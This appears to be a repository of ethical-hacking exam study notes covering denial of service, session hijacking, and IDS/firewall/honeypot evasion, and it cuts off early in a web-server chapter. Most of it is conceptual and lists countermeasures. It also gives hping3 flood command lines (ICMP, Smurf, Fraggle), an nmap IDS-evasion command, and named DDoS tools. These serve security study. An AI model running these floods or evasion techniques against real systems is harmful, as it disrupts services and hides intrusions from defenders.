├── 1-Introduction.md
├── 10-Denial-of-Service.md
├── 11-Session-Hijacking.md
├── 12-Evading-IDS-Firewalls-and-Honeypots.md
├── 13-Hacking-Web-Servers.md
├── 14-Hacking-Web-Applications.md
├── 14-Pentesting.md
├── 16-Hacking-Wireless-Networks.md
├── 17-Hacking-Mobile-Platforms-and-IoT.md
├── 19-Cloud Computing.md
├── 2-Footprinting-and-Reconnaissance.md
├── 20-Cryptography.md
├── 3-Scanning-Networks.md
├── 5-Vulnerability-Analysis.md
├── 6-System-Hacking.md
├── 7-Malware.md
├── 8-Sniffing.md
├── 9-Social-Engineering.md
├── All-Modules.html
├── All-Modules.md
└── README.md
/10-Denial-of-Service.md:
--------------------------------------------------------------------------------
1 | # Denial of Service
2 |
3 | > ⚡︎ **This chapter has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/tree/master/9-Denial-of-Service)**
4 |
5 | ## DoS
6 | *A Denial of Service (DoS) is a type of attack on a service that disrupts its normal function and prevents other users from accessing it. The most common target for a DoS attack is an online service such as a website, though attacks can also be launched against networks, machines or even a single program.*
7 |
8 | DoS attacks can cause the following problems:
9 | - Ineffective services
10 | - Inaccessible services
11 | - Interruption of network traffic
12 | - Connection interference
13 |
14 | ## DDoS
15 | *A distributed denial of service (DDoS) attack is launched from numerous compromised devices, often distributed globally in what is referred to as a **botnet**.*
16 |
17 | 
18 |
19 | **Goal:**
20 | - Seeks to take down a system or deny access to it by authorized users.
21 |
22 | ### **Botnet**
23 | *Network of zombie computers a hacker uses to start a distributed attack.*
24 | - Botnets can be designed to do malicious tasks including sending **spam, stealing data, ransomware, fraudulently clicking on ads or distributed denial-of-service (DDoS) attacks.**
25 | - Can be controlled over HTTP, HTTPS, IRC, or ICQ
26 |
27 | 
28 |
29 | - **Botnet Scanning Methods**:
30 | - **Random** - Randomly looks for vulnerable devices
31 | - **Hitlist** - Given a list of devices to scan for vulnerabilities
32 | - **Topological** - Scan hosts discovered by currently exploited devices
33 | - **Local subnet** - Scans local network for vulnerable devices
34 | - **Permutation** - Scan list of devices created through pseudorandom permutation algorithm
35 |
36 |
37 |
38 | ## Three Types of DoS / DDoS
39 |
40 | ### **1. Volumetric attacks**
41 | - Consumes the bandwidth of target network or service.
42 | - Send a massive amount of traffic to the target network with the goal of consuming **so much bandwidth** that users are denied access.
43 | - Bandwitdh depletion attack: Flood Attack and Amplification attack.
44 |
45 | - **Attacks**:
46 | - UDP flood attack
47 | - ICMP flood attack
48 | - Ping of Death attack
49 | - Smurf attack (IP)
50 | - Fraggle (UDP)
51 | - Malformed IP packet flood attack
52 | - Spoofed IP packet flood attack
53 |
54 | > - ⚠️ **Volumetric attacks is measured in Bits per second (Bps).**
55 |
56 | ### **2. Protocol Attacks**
57 | - Consume other types of resources like **connection state tables** present in the network infrastructure components such as **load balancers, firewalls, and application servers**.
58 | - **Attacks**:
59 | - SYN flood attack
60 | - Fragmentation attack
61 | - ACK flood attack
62 | - TCP state exhaustion attack
63 | - TCP connection flood attack
64 | - RST attack
65 |
66 | > - ⚠️ **Protocol attacks is measured in Packets per second (Pps).**
67 |
68 | ### **3. Application Layer Attacks**
69 |
70 | - Includes low-and-slow attacks, GET/POST floods, attacks that target Apache, Windows or OpenBSD vulnerabilities and more.
71 | - Consume the resources necessary for the application to run.
72 | - Target web servers, web application and specific web-based apps.
73 | - Abuse higher-layer (7) protocols like HTTP/HTTPS and SNMP.
74 | - **Attacks**:
75 | - HTTP GET/POST attack
76 | - Slowloris attack
77 |
78 | > - ⚠️ **Application layer attacks is measured in Requests per second (Rps).**
79 |
80 | > - ⚠️ **Application level attacks are against weak code.**
81 |
82 |
83 | ## Attacks explanation
84 |
85 | ### **IP Fragmentation attacks**
86 | - IP / ICMP fragmentation attack is a common form of volumetric DoS. In such an attack, datagram fragmentation mechanisms are used to overwhelm the network.
87 |
88 | - Bombard the destination with fragmented packets, causing it to use memory to reassemble all those fragments and overwhelm a targeted network.
89 |
90 | - **Can manifest in different ways:**
91 | - **UDP Flooding** - attacker sends large volumes of fragments from numerous sources.
92 | - **UDP and ICMP** fragmentation attack - only parts of the packets is sent to the target; Since the packets are fake and can't be reassembled, the server's resources are quickly consumed.
93 | - **TCP fragmentation attack** - also know as a Teardrop attack, targets TCP/IP reassembly mechanisms; Fragmented packets are prevented from being reassembled. The result is that data packets overlap and the targeted server becomes completely overwhelmed.
94 |
95 | ### **TCP state-exhaustion attack**
96 | - Attempt to consume connection state tables like: **Load balancers, firewalls and application servers.**
97 |
98 | ### **Slowloris attack**
99 | *Is an application layer attack which operates by utilizing partial HTTP requests. The attack functions by opening connections to a targeted Web server and then keeping those connections open as long as it can.*
100 |
101 | - 
102 |
103 | - The attacker first opens multiple connections to the targeted server by sending multiple partial HTTP request headers.
104 | - The target opens a thread for each incoming request
105 | - To prevent the target from timing out the connections, the attacker periodically sends partial request headers to the target in order to keep the request alive. In essence saying, “I’m still here! I’m just slow, please wait for me.”
106 | - The targeted server is never able to release any of the open partial connections while waiting for the termination of the request.
107 | - Once all available threads are in use, the server will be unable to respond to additional requests made from regular traffic, resulting in denial-of-service.
108 |
109 | ### **SYN attack**
110 | - Sends thousands of SYN packets
111 | - Uses a **false source address** / spoofed IP address.
112 | - The server then responds to each one of the connection requests and leaves an open port ready to receive the response.
113 | - Eventually engages all resources and exhausts the machine
114 |
115 | ### **SYN flood (half-open attack)**
116 | - Sends thousands of SYN packets
117 | - While the **server waits for the final ACK packet**, **which never arrives**, the attacker continues to send more SYN packets. The arrival of each new SYN packet causes the server to temporarily maintain a new open port connection for a certain length of time, and once all the available ports have been utilized the server is unable to function normally.
118 | - Eventually bogs down the computer, runs out of resources.
119 |
120 | - 
121 |
122 | ### **ICMP flood**
123 | - Sends ICMP Echo packets with a spoofed address; eventually reaches limit of packets per second sent
124 | - Is possible to use `hping3` to perform ICMP flood:
125 | - `hping -1 --flood --rand-source `
126 |
127 | ### **Smurf attack**
128 | - The Smurf attack is a **distributed denial-of-service** attack in which large numbers of ICMP packets with the intended victim's **spoofed source IP are broadcast to a computer network using an IP broadcast address.**
129 | - Is possible to use `hping3` to perform this attack and bash script to loop through the subnet.
130 | - `hping3 -1 -c 1000 10.0.0.$i --fast -a `
131 | - 
132 |
133 | ### **Fraggle**
134 | - Same concept as Smurf attack but with **UDP packets** (UDP flood attack).
135 | - Is possible to use `hping3` to perform Fraggle attack/ UDP flood
136 | - `hping3 --flood --rand-source --udp -p `
137 |
138 | ### **Ping of Death**
139 | - Fragments ICMP messages; after reassembled, the ICMP packet is larger than the maximum size and crashes the system
140 | - Performs by sending an IP packet larger than the 65,536 bytes allowed by the IP protocol.
141 | - Old technique that can be acceptable to old systems.
142 |
143 | ### **Teardrop**
144 | - Overlaps a large number of garbled IP fragments with oversized payloads; causes older systems to crash due to fragment reassembly
145 |
146 | ### **Peer to peer**
147 | - Clients of peer-to-peer file-sharing hub are disconnected and directed to connect to the target system
148 |
149 | ### **Multi-vector attack**
150 | - Is a combination of **Volumetric, protocol, and application-layer attacks**.
151 |
152 | ### **Phlashing / Permanent DoS**
153 | - A DoS attack that causes permanent damage to a system.
154 | - Modifies the firmware and can also cause a **system to brick**.
155 | - *e.g: Send fraudulent hardware update to victim; crashing BIOS.*
156 |
157 | ### **LAND attack**
158 | - Sends a SYN packet to the target with a spoofed IP the same as the target; if vulnerable, target loops endlessly and crashes
159 |
160 |
161 | ## DoS/DDoS Attack Tools:
162 | - **Low Orbit Ion Cannon** (LOIC) - DDoS tool that floods a target with TCP, UDP or HTTP requests
163 | - 
164 |
165 | - **High Orbit Ion Cannon** (HOIC) - More powerful version of LOIC; Targets TCP and UDP; The application can open up to 256 simultaneous attack sessions at once, bringing down a target system by sending a continuous stream of junk traffic until legitimate requests are no longer able to be processed;
166 | - 
167 |
168 | - **Other Tools**
169 | - HULK
170 | - Metasploit
171 | - Nmap
172 | - Tsunami
173 | - Trinity - Linux based DDoS tool
174 | - Tribe Flood Network - uses voluntary botnet systems to launch massive flood attacks
175 | - RUDY (R-U-Dead-Yet?) - DoS with HTTP POST via long-form field submissions
176 |
177 | ## Mitigations
178 | - Traffic analysis
179 | - Filtering
180 | - Firewalls
181 | - ACLs
182 | - Reverse Proxies
183 | - Rate limiting - limiting the maximum number of connections a single IP address is allowed to make)
184 | - Load balancers
185 | - DoS prevention software
186 |
--------------------------------------------------------------------------------
/11-Session-Hijacking.md:
--------------------------------------------------------------------------------
1 | # Session Hijacking
2 |
3 | > ⚡︎ **This chapter has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/tree/master/10-Session-Hijacking)**
4 |
5 | *The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token.* [[+]](https://owasp.org/www-community/attacks/Session_hijacking_attack)
6 |
7 | - HTTP communication uses many different TCP connections, the web server needs a method to recognize every user’s connections.
8 | - The most useful method depends on a **token** that the Web Server sends to the client browser after a successful client authentication.
9 | - A **session token** is normally composed of a string of variable width and it could be used in different ways
10 | - like in the URL, in the header of the HTTP requisition as a cookie, in other parts of the header of the HTTP request, or yet in the body of the HTTP requisition.
11 |
12 | **The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.**
13 |
14 |
15 |
16 |
17 |
18 | Session Hijacking using XSS
19 |
20 |
21 | ## **The session token could be compromised in different ways; the most common are:**
22 |
23 | ### **Predictable session token**
24 | - The session ID information for a certain application is normally composed by a string of fixed width. **Randomness is very important** to avoid its prediction.
25 | - **Example:** Session ID value is “user01”, which corresponds to the username. By trying new values for it, like “user02”, it could be possible to get inside the application without prior authentication.
26 |
27 | ### **Session Sniffing**
28 | - Sniffing can be used to hijack a session when there is non-encrypted communication between the web server and the user, and the session ID is being sent in plain text.
29 | - **Wireshark** and **Kismet** can be used to capture sensitive data packets such as the session ID from the network.
30 |
31 | ### **Cross-site scripting (XSS)**
32 | - A server can be vulnerable to a cross-site scripting exploit, which enables an attacker to execute malicious code from the user’s side, gathering session information. An attacker can target a victim’s browser and send a scripted JavaScript link, which upon opening by the user, runs the malicious code in the browser hijacking sessions.
33 |
34 | ### **CSRF - Cross-Site Request Forgery**
35 | - Forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing;
36 | - CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
37 |
38 | - **CSRF Scenario:**
39 | 1. Visit your bank's site, log in.
40 | 2. Then visit the attacker's site (e.g. sponsored ad from an untrusted organization).
41 | 3. Attacker's page includes form with same fields as the bank's "Transfer Funds" form.
42 | 4. Form fields are pre-filled to transfer money from your account to attacker's account.
43 | 5. Attacker's page includes Javascript that submits form to your bank.
44 | 6. When form gets submitted, browser includes your cookies for the bank site, including the session token.
45 | 7. Bank transfers money to attacker's account.
46 | 8. The form can be in an iframe that is invisible, so you never know the attack occurred.
47 |
48 | ### **Session Fixation**
49 | - Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack explores a limitation in the way the web application manages the session ID, more specifically the vulnerable web application.
50 |
51 | - **Session fixation Scenario**:
52 | 1. The attacker accesses the web application login page and **receives a session ID** generated by the web application.
53 | 2. The attacker uses an additional technique such as **CRLF Injection, man-in-the-middle attack, social engineering,** etc., and gets the victim to use the **provided session identifier**.
54 | 3. The victim accesses the web application login page and logs in to the application. After authenticating, the **web application treats anyone who uses this session ID as if they were this user.**
55 | 4. The attacker uses the session ID to access the web application, **take over the user session, and impersonate the victim**.
56 |
57 | ### **Man-in-the-browser attack**
58 | - The Man-in-the-Browser attack is the same approach as Man-in-the-middle attack, but in this case a Trojan Horse is used to intercept and manipulate calls between the main application’s executable.
59 |
60 | ### **Man-in-the-middle attack**
61 | - MITM attack is a general term for when a perpetrator positions himself in a conversation between a user and an application—either to eavesdrop or to impersonate one of the parties, making it appear as if a normal exchange of information is underway.
62 |
63 |
64 | ## Other attacks
65 | - **Compression Ratio Info-leak Made Easy (CRIME)**:
66 | - Is a security exploit against secret web cookies over connections using the HTTPS and SPDY protocols that also use data compression. When used to recover the content of secret authentication cookies, it allows an attacker to perform session hijacking.
67 | - **BREACH**:
68 | - Is a security exploit against HTTPS when using HTTP compression (SSL/TLS compression). BREACH is built based on the CRIME security exploit.
69 |
70 | > ⚠️ **SPDY protocol manipulates HTTP traffic, with particular goals of reducing web page load latency and improving web security.**
71 |
72 | - **Forbideen Attack**
73 | Vulnerability in TLS that incorrectly reuse the **same cryptographic nonce when data is encrypted**. TLS specifications are clear that these arbitrary pieces of data should be used only once. When the same one is used more than once, it provides an opportunity to carry out the forbidden attack.
74 |
75 | ## Network Layer Attacks
76 | - **TCP Hijacking**: TCP/IP Hijacking is when an authorized user gains access to a genuine network connection of another user. It is done in order to bypass the password authentication which is normally the start of a session.
77 | - e.g: TELNET Hijacking using Ettercap, Shijack, making a blind hijacking.
78 |
79 | ### **Tools**
80 | - **Ettercap** - MiTM tool and packet sniffer on steroids
81 | - **Hunt** - sniff, hijack and reset connections
82 | - **T-Sight** - easily hijack sessions and monitor network connections
83 | - **Zaproxy**
84 | - **Burp Suite**
85 | - **Paros**
86 | - **Shijack** - TCP/IP hijack tools
87 | - **Juggernaut**
88 | - **Hamster**
89 | - **Ferret**
90 |
91 | ## Countermeasures
92 | * **Session IDS**
93 | - Using unpredictable (randomized) Session IDs
94 | - Never use URL's with Sessions IDs
95 | - Don't Re-use Session IDs
96 | - Use **HTTP-Only on Cookies** preventing XSS (Cross-Site Scripting)
97 | - Don't use HTTP protocol without encryption --> Use TLS/SSL [HTTPS]
98 | - Limiting incoming connections
99 | - Minimizing remote access
100 | - Regenerating the session key after authentication
101 | - Time - absolute / inactive *(e.g: 1h of inactivity the user will automatically log off)*
102 | - Use **MFA**
103 | - Use **IPSec to encrypt**
104 |
105 | ### IPSec
106 | - **Transport Mode** - payload and ESP trailer are encrypted; IP header is not
107 | - **Tunnel mode** - everything is encrypted; cannot be used with NAT
108 | - **Architecture Protocols**
109 | - **Authentication Header** - guarantees the integrity and authentication of IP packet sender
110 | - **Encapsulating Security Payload** (ESP) - provides origin authenticity and integrity as well as confidentiality
111 | - **Internet Key Exchange** (IKE) - produces the keys for the encryption process
112 | - **Oakley** - uses Diffie-Hellman to create master and session keys
113 | - **Internet Security Association Key Management Protocol** (ISAKMP) - software that facilitates encrypted communication between two endpoints
114 |
--------------------------------------------------------------------------------
/12-Evading-IDS-Firewalls-and-Honeypots.md:
--------------------------------------------------------------------------------
1 | # Evading IDS, Firewalls and Honeypots
2 |
3 | ## IDS/IPS - Basic Concepts
4 |
5 | **Intrusion Prevention System (IPS)** - ACTIVE monitoring of activity looking for anomalies and alerting/notifiying AND **taking action when they are found**.
6 |
7 | **Intrusion Detection System (IDS)** - PASSIVE monitoring of activity looking for anomalies and alerting/notifying when they are found.
8 |
9 |
10 |
11 |
12 |
13 | ### **Deployment Types - HIDS & NIDS & WIDS:**
14 | 1. **Host based** - Monitors activity on a single device/host by being installed lcoally.
15 |
16 | 2. **Network based** - Monitors activity across a network using remote sensors that reprot back to a central system. Often paired with a security Information & SIEM system for analysis. Often Reverse ARP or Reverse DNS lookups are used to discover the source
17 |
18 | ### **Knowledge & Behavior-Based Detection:**
19 | 1. **Knowledge Based (Signature Based | Pattern Matching)** - Most common form of detection. Uses a database of profiles, or signatures to assess all traffic against.
20 |
21 | 2. **Behavior Based (Statistical | Anomaly | Heuristic)** - Starts by creating a baseline of behavior for the monitored system/network and then comapres all traffic against that looking for deviations. Can be labeled an AI or Expert system.
22 |
23 | ---
24 | ### **Types of IDS Alerts**
25 | - **True Positive** --> Attack - Alert ✅✅
26 | - **False Positive** --> No Attack - Alert ❌✅
27 | - **False Negative** --> Attack - No Alert ✅❌
28 | - *This is the worst scenario*
29 | - **True Negative** --> No Attack - No Alert ❌❌
30 |
31 | ---
32 |
33 | ## Firewalls - Basic Concepts
34 | *Firewalls are often seen as NAC devices. Use of rule sets to filter traffic can implement security policy.*
35 |
36 | ### **Firewalls types:**
37 | - **Stateful (Dynamic Packet Filtering)** - Layer 3 + 4 (Network + Transport layer)
38 | - **Stateless (Static Packet Filtering)** - Layer 3 (Network)
39 | - **Deep Packet Inspection** - Layer 7 (Application Layer)
40 | - **Proxy Firewall** - Mediates communications between unstrusted and trusted end-points (server/hosts/clients). A proxy firewall is a network security system that protects network resources by filtering messages at the Application Layer 7. A proxy firewall may also be called an application firewall or gateway firewall.
41 |
42 | ### **Proxy Types:**
43 | - **Circuit-level proxy** - Firewall that works on **Layer 5 (Session layer)**; They monitor TCP handshaking between packets to determine whether a requested session is legitimate.
44 | - **Application-level proxy** - Any service or server that acts as a proxy for client computer requests at the application’s protocols.
45 |
46 | > **⚠️ An application-level proxy is one that knows about the particular application it is providing proxy services for; it understands and interprets the commands in the application protocol. A circuit-level proxy is one that creates a circuit between the client and the server without interpreting the application protocol.**
47 |
48 | - **Multi-homed Firewall (dual-homed)** - Firewall that has two or more interfaces; One interface is connected to the untrusted network and another interface is connected to the trusted network. A DMZ can be added to a multi-homed firewall just by adding a third interface.
49 |
50 | - **Bastion hosts** - Endpoint that is exposed to the internet but has been hardened to withstand attacks; Hosts on the screened subnet designed to protect internal resources.
51 |
52 | - **Screened host** - Endpoint that is protected by a firewall.
53 |
54 | - **Packet-filtering** - Firewalls that only looked at headers
55 |
56 |
57 | > ⚠️ Only uses rules that **implicitly denies** traffic unless it is allowed.
58 |
59 | > ⚠️ Oftentimes uses **network address translation** (NAT) which can apply a one-to-one or one-to-many relationship between external and internal IP addresses.
60 |
61 | > ⚠️ **Private zone** - hosts internal hosts that only respond to requests from within that zone
62 |
63 |
64 | ## Honeypots 🍯
65 | *Honeypots are decoy systems or servers deployed alongside production systems within your network. When deployed as enticing targets for attackers, honeypots can add security monitoring opportunities for blue teams and misdirect the adversary from their true target.*
66 |
67 | - **Honeynet** - Two or more honeypots on a network form a honeynet. Honeynets and honeypots are usually implemented as parts of larger Network Intrusion Detection Systems.
68 |
69 | - A **Honeyfarm** is a centralized collection of honeypots and analysis tools.
70 |
71 | ### **Types of Honeypots:**
72 | 1. **Low-interaction** ---> Simulates/imitate services and systems that frequently attract criminal attention. They offer a method for collecting data from blind attacks such as botnets and worms malware.
73 | 2. **High interaction** ---> Simulates all services and applications and is designed to be completely compromised
74 | 3. **Production** ---> Serve as decoy systems inside fully operating networks and servers, often as part of an intrusion detection system (IDS). They deflect criminal attention from the real system while analyzing malicious activity to help mitigate vulnerabilities.
75 | 4. **Research** ---> Used for educational purposes and security enhancement. They contain trackable data that you can trace when stolen to analyze the attack.
76 |
77 | - **Honeypot Tools:**
78 | - Specter
79 | - Honeyd
80 | - KFSensor (Honeypot IDS)
81 |
82 | ## Evading with Nmap
83 |
84 | ### **Useful switches for Evading and Stealthy**:
85 |
86 | Nmap Switch | Information
87 | --|--
88 | `-v` | Verbose level
89 | `-sS` | TCP SYN scan
90 | `-T` | Time template for performing the scan
91 | `-f` | Use fragmented IP packets
92 | `-f --mtu` | Use fragmented packets & set MTU
93 | `-D`| IP address Decoy: : Cloak a scan with decoys
94 | `-S` | Spoof the source IP address
95 | `--send-eth` | Ensures that we use Ethernet level packets. bypassing the IP layer and sends raw Ethernet frames within the flow
96 | `--data-length` | Specify the length of data/frame
97 | `--source-port` | Specify a randomized port that you want to comunicate
98 |
99 | ---
100 | ### **Example:**
101 |
102 | • Sends IPv4 fragmented 50-byte packet size; The packets are too small to send data and to detect as a Probe/Scanning technique:
103 |
104 | `nmap -v -sS -f -mtu 32 --send-eth --data-length 50 --source-port 8965 -T5 192.168.0.22`
105 |
106 | > ⚠️ **Fragmentation is the heart of the IDS/Firewall Evasion techniques.**
107 | ---
108 |
109 | ## Using SNORT
110 | *SNORT is an open source network intrusion detection system (NIDS). Snort is a packet sniffer that monitors network traffic in real time, scrutinizing each packet closely to detect a dangerous payload or suspicious anomalies.*
111 |
112 | - Snort is a widely deployed IDS that is open source
113 | - Includes a **sniffer**, **traffic logger** and a **protocol analyzer**
114 | - Runs in three different modes
115 | - **Sniffer** - Watches packets in real time
116 | - **Packet logger** - Saves packets to disk for review at a later time
117 | - **NIDS** - Analyzes network traffic against various rule sets
118 | - Configuration is in `/etc/snort` on Linux and `C:\snort\etc` in Windows; the file is **snort.conf**.
119 |
120 | ### **SNORT basics commands:**
121 |
122 | **Operational modes:**
123 | - Snort as **Sniffer** ---> `snort -v`
124 |
125 | - Snort as **Packet logger** ---> `snort -l`
126 |
127 | - Snort as **NIDS** ---> `snort -A` or `snort -c `
128 |
129 | **Example of usage**:
130 |
131 | - **`snort -i 4 -l c:\Snort\log -c c:\Snort\etc\snort.conf -T`**
132 | - *This command will test snort configuration and rules and check if there is any erros without starting up.*
133 | - `-i 4` ---> interface specifier, in case is interface 4.
134 | - `-l` ---> for logging
135 | - `-c` ---> use Snort rules file specifying path
136 | - `-T` ---> Only For testing, this prevent Snort from start up; Essentially to check if there is any errors and if the rules are good.
137 |
138 | - **`snort -i 4 -c c:\Snort\etc\snort.conf -l c:\Snort\log -K ascii`**
139 | - *This command will fire up Snort NIDS and log everything in ASCII.*
140 |
141 | **Basic commands**:
142 | Flag | Information
143 | -|-
144 | `-A` | Set alert mode: fast, full, console, test or none
145 | `-b` | Log packets in tcpdump format (much faster!)
146 | `-B ` | Obfuscate IP addresses in alerts and packet dumps using CIDR mask
147 | `-c ` | Use Rules file
148 | `-C` | Print out payloads with character data only (no hex)
149 | `-l` | Specifies the logging directory (all alerts and packet logs are placed in this directory)
150 | `-i ` | Specifies which interface Snort should listen on
151 | `-K` | Logging mode (pcap[default], ascii, none)
152 | `-?` | Lists all switches and options and then exits
153 |
154 | ### **SNORT Rules**
155 | *SNORT has a rules engine that allows for customization of monitoring and detection capabilities.*
156 |
157 | - **There are three available rule actions**
158 | 1. Alert
159 | 2. Pass
160 | 3. Log
161 | - **And three available IP protocols:**
162 | 1. TCP
163 | 2. UDP
164 | 3. ICMP
165 |
166 | ### **Breaking down a Snort rule:**
167 |
168 | > **`alert icmp any any -> &HOME_NET any (msg:"ICMP test"; sid:1000001; rev:1; classtype:icmp-event;)`**
169 |
170 | Rule part | Information
171 | -|-
172 | `alert icmp any any -> $HOME_NET any` | **Rule Header** ⬇️
173 | `alert` | Rule action. Snort will generate an alerta when the set condition is met.
174 | `any` (1st) | Source IP. Snort will look at all sources
175 | `any` (2nd) | Source port. Snort will look at all ports
176 | `->` | Direction. From source to destination; *(source -> destination)*
177 | `&HOME_NET` | Destination IP. We are using the HOME_NET value from the snort.conf file which means a variable that defines the network or networks you are trying to protect.
178 | `any` (3rd) | Destination port. Snort will look at all ports on the protected network
179 | `(msg:"ICMP test"; sid:1000001; rev:1; classtype:icmp-event;)` | **Rule Options** ⬇️
180 | `msg:"ICMP test"` | Snort will include this message with the alert
181 | `sid:1000001` | Snort rule ID. Remember all numbers < 1,000,000 are reserved, this is why we are starting with 1000001 (you may use any number, as long as it's grater that 1,000,000)
182 | `rev:1` | Revision number. This option allows for easier rule maintenance
183 | `classtype:icmp-event` | Categorizes the rule as an "icmp-event", one of the predefined Snort categories. This options helps with the rule organization
184 | ---
185 | ### Rules Examples:
186 | > **`alert tcp 192.168.x.x any -> &HOME_NET 21 (msg:"FTP connection attempt"; sid:1000002; rev:1;)`**
187 | - TCP alert in a source IP address 192.168.x.x with any port; HOME_NET destination on port 21.
188 |
189 | > **`alert tcp $HOME_NET 21 -> any any (msg:"FTP failed login"; content:"Login or password incorrent"; sid:1000003; rev:1;)`**
190 | - TCP alert in HOME_NET port 21 (FTP) as a source, to any destination IP address and port.
191 |
192 | > **`alert tcp !HOME_NET any -> $HOME_NET 31337 (msg : "BACKDOOR ATTEMPT-BackOrifice")`**
193 | - This alerts about traffic coming not from an external network to the internal one on port 31337.
194 |
195 | **Example output**
196 | - 10/19-14:48:38.543734 0:48:542:2A:67 -> 0:10:B5:3C:34:C4 type:0x800 len:0x5EA
197 | - **xxx -> xxx TCP TTL:64 TOS:0x0 ID:18112 IpLen:20 DgmLen:1500 DF**
198 | - Important info is bolded
199 |
200 | ## Evasion Concepts and Techniques
201 |
202 | - **Insertion Attack** - Attacker forces the IDS to process invalid packets.
203 |
204 | - **Evasion** - An endpoint accepts a packet that the IDS would normally reject. Typically executed via **fragmentation** of the attack packets to allow them to be moved through the IDS.
205 |
206 | - **Obfuscation** - Encoding the attack packets in such a way that the target is able to decode them, but the IDS is not.
207 | - Unicode
208 | - Polymorphic code
209 | - Encryption
210 | - Path manipulation to cause signature mismatch
211 |
212 | - **False Positive Generation Events** - Crafting malicious packets designed to set off alarms with hope of distracting/overwhelming IDS and operators.
213 |
214 | - **Session Splicing** - Just another type of fragmentation attack.
215 |
216 | - **Unicode encoding** - works with web requests - using Unicode characters instead of ascii can sometimes get past
217 |
218 | - **Fragmentation attack** - Splits up packets so that the IDS can't detect the real intent
219 |
220 | - **Overlapping Fragments** - Generate a bunch of tiny fragments overlapping TCP sequence numbers.
221 |
222 | - **Time-To-Live (TTL) Attack** - Requires the attacker to have inside knowledge of the target network to allow for the adjusment of the TTL values to control who gets what packets when.
223 |
224 | - **Invalid RST Packets** - Manipulation of the RST flag to trick IDS into ignoring the communication session with the target.
225 |
226 | - **Urgency Flag - URG** - Manipulation URG flag to cause the target and IDS to have different sets of packets, because the IDS processes ALL packets irrespective of the URG flag, whereas the target will only process URG traffic.
227 |
228 | - **Polymorphic Shellcode** - Blow up the pattern matching by constantly changing.
229 |
230 | - **ASCII Shellcode** - Use ASCII characters to bypass pattern matching.
231 |
232 | - **Application-Level Attacks** - Taking advantage of the compression used to transfer large files and hide attacks in compressed data, as it cannot be examined by the IDS.
233 |
234 | - **Desynchronization** - Manipulation the TCP SYN to fool IDS into not paying attention to the sequence numbers of the illegitimate attack traffic, but rather, give it a false set of sequences to follow.
235 |
236 | - **Encryption** - Using encryption to hide attack.
237 |
238 | - **Flood the network** - Trigger alerts that aren't your intended attack so that you confuse firewalls/IDS and network admins; Overwhelming the IDS.
239 |
240 | > ⚠️ **Slow down** - Faster scanning such as using nmap's -T5 switch will get you caught. Pros use -T1 switch to get better results
241 |
242 | **Tools for Evasion**
243 | - **Nessus** - Also a vulnerability scanner
244 | - **ADMmutate** - Creates scripts not recognizable by signature files
245 | - **NIDSbench** - Older tool for fragmenting bits
246 | - **Inundator** - Flooding tool
247 |
248 | ## Firewall Evasion
249 | - **Firewalking** - Using TTL values to determine gateway ACL filters and allow for mapping of internal networks by analyzing IP packet responses; Going through every port on a firewall to determine what is open.
250 |
251 | - **Banner Grabbing** - Looking for FTP, TELNET and web server banners.
252 |
253 | - **IP Address Spoofing** - Hijacking technique allowing attacker to masquerade as a trusted host.
254 |
255 | - **Source Routing** - Allows the sender of a packet to partially or fully specify the route to be used.
256 |
257 | - **Tiny Fragments** - Sucessful with Firewalls when they ONLY CHECK for the TCP header info, allowing the fragmentation of the information across multiple packets to hide the true intention of the attack.
258 |
259 | - **ICMP Tunneling** - Allows for the tunneling of a backdoor shell via the ICMP echo packets because the RFC (792) does not clearly define what kind of data goes in the data portion of the frame, allowing for attack traffic to be seen as acceptable when inserted. If firewalls do not examine the payload section of the dataframe, they would let the data through, allowing the attack.
260 |
261 | - **ACK Tunneling** - Use of the ACK flag to trick firewall into allowing packets, as many firewalls do not check ACK packets.
262 |
263 | - **HTTP Tunneling** - Use of HTTP traffic to 'hide' attacks.
264 |
265 | - **SSH Tunneling** - Use of SSH to encrypt and send attack traffic.
266 |
267 | - **MitM Attacks** - Use of DNS and routing manipulation to bypass firewalls.
268 |
269 | - **XSS Attacks** - Allows for the exploitation of vulnerabilities around the processing of input parameters from the end user and the server responses in a web application. The attacker injects malicious HTML/JS code into website to force the bypassing of the firewall once executed.
270 |
271 | - *Use IP in place of a URL - may work depending on nature of filtering in place*
272 | - *Use Proxy Servers/Anonymizers - May work depending on nature of filtering in place*
273 | - *ICMP Type 3 Code 13 will show that traffic is being blocked by firewall*
274 | - *ICMP Type 3 Code 3 tells you the client itself has the port closed*
275 |
276 | - **Tools**
277 | - CovertTCP
278 | - ICMP Shell
279 | - 007 Shell
280 | - The best way around a firewall will always be a compromised internal machine
281 |
282 | ## How to detect a Honeypot
283 | *Probe services running on them; Ports that show a service is available, but **deny a three-way handshake may indicate that the system is a honeypot***.
284 |
285 | * **Layer 7 (Application)** - Examine latency of responses from server
286 | * **Layer 4 (Transport)** - Examine the TCP windows size, looing for continuous Acknowledgement of incoming packets even when the windows size is set to 0.
287 | * **Layer 2 (Data Link)** - If you are on the same network as the honeypot, **look for MAC addresses** in packets that indicate the presence of a **'Black Hole'** (`0:0:f:ff:ff:ff`)
288 |
289 | > ⚠️ **The exam will not cover every information presented, but is good to have a general idea.**
290 |
291 | * If Honeypot is virtualized, look for the vendor assigned MAC address ranges as published by IEEE.
292 | * If Honeypot is the **Honeyd** type, use time based TCP fingerprinting methods to detect
293 | * Detecting **User-Mode Linux (UML) honeypot**, analyze `proc/mounts`, `proc/interrupts` and `proc/cmdline` which would have UML specific settings and information.
294 | * Detecting Sebek-based honeypots, Sebek will log everything that is accessed via `read()` **before** sending to the network, causing congestion that can be an indicator.
295 | * Detecting **snort_inline honeypots**, analyze the outgoing packets by capturing the snort_inline modified packets through another
296 |
--------------------------------------------------------------------------------
/13-Hacking-Web-Servers.md:
--------------------------------------------------------------------------------
1 | # Hacking Web Servers
2 |
3 | ## Web Server Attack Methodology
4 |
5 | - **Information Gathering** - Internet searches, whois, reviewing robots.txt
6 |
7 | - **Web Server Footprinting** - banner grabbing
8 | - **Tools**
9 | - Netcraft
10 | - HTTPRecon
11 | - theHarvester
12 | - ID Serve
13 | - HTTPrint
14 | - nmap
